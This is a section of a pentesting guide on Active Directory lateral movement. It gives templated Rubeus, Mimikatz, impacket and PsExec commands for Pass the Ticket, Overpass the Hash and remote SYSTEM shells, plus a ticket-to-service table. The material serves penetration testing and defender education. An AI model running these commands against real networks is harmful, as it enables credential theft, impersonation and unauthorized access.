The Pentesting Guide

Lateral Movement

Introduction

In this section you will find techniques to perform lateral movement across an Active Directory infrastructure.

Pass The Ticket (PTT)

In the Pass the Ticket technique, an attacker obtains a valid Kerberos ticket-granting ticket (TGT) by stealing it from a user or extracting it from a computer's memory. The attacker can then use this TGT to request additional service tickets without the need for any further authentication.

You can perform this technique with Rubeus.

.\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:<DOMAIN> /username:<USERNAME> /password:FakePass123 /ticket:<TICKET>

Depending on the TGS you obtained, you will only be able to perform specific tasks.

Tickets - Techniques

Service Type                                    Required Tickets (service classes)
Windows File Share (PsExec)                     CIFS
LDAP Operations (DCSync)                        LDAP
WinRM                                           HOST, HTTP, WINRM
WMI                                             HOST, RPCSS
PowerShell Remoting                             HOST, HTTP (depending on OS: WSMAN, RPCSS)
Scheduled Tasks                                 HOST
Windows Remote Server Administration Tools      RPCSS, LDAP, CIFS
Golden Tickets                                  krbtgt

Overpass The Hash (OTH)

This technique allows an attacker who holds an account's NTLM hash or Kerberos AES/RC4 key to request a TGT for that account without knowing its password.

  • Alternative 1 - Without HIGH privileges

# Option A: Rubeus (Windows)
.\Rubeus.exe asktgt /nowrap /user:<USER> [/dc:<DC_IP>] [/ntlm:<HASH_NTLM>|/aes256:<AES256_KEY>|/rc4:<RC4_KEY>] [/opsec|/force] /ptt
# Option B: impacket (Linux)
impacket-getTGT <DOMAIN>/<USERNAME>[:password] -dc-ip <DC_IP> -hashes LMHASH:NTHASH
  • Alternative 2 - Requires HIGH privileges

[.\Mimikatz.exe | .\SafetyKatz.exe ] "sekurlsa::pth /user:<USER2IMPERSONATE> /domain:<DOMAIN> [/ntlm:<HASH_NTLM>|/aes256:<AES256_KEY>|/rc4:<RC4_KEY>] /run:[cmd.exe | powershell.exe]" "exit"

Then, if the user has administrator privileges on the target, you can use PsExec to access the machine.

# Option A: Sysinternals PsExec (Windows)
.\PsExec.exe /accepteula [-s] \\<COMPUTER_NAME> <PROGRAM>
# Option B: impacket-psexec (Linux), using the ticket obtained above
export KRB5CCNAME=<PATH_TICKET.ccache>
impacket-psexec -k -no-pass [[domain/]username@]<COMPUTER_NAME> -dc-ip <DC-IP> [-c <PROGRAM.EXE>]

Note: the PsExec -s argument upgrades the session to "nt authority\system", but it only works if you connect as a highly privileged user.

S4U2Self Abuse (Constrained Delegation)

The exploitation is covered in the Kerberos exploitation phase.

Alternate Service Name (Constrained Delegation)

The exploitation is covered in the Kerberos exploitation phase.